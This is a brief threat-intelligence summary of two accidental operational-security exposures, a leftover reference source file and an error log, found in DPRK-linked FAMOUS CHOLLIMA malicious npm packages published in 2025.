KMSEC documents two accidental operational-security exposures linked to FAMOUS CHOLLIMA npm activity. Several malicious packages published between July and September 2025 included an `ordinary.txt` JavaScript source file that appears to have been a reference sample before modification and obfuscation, with commented code and a local payload server on port 4444. A separate `err.log` in the `some-promise` package exposed a Windows path, the operator username `dvant`, and evidence that the actor was modifying the legitimate `any-promise` package in place before publishing a malicious version. These artifacts are not directly defensive indicators, but they provide useful context on DPRK-linked npm malware development practices and operator mistakes.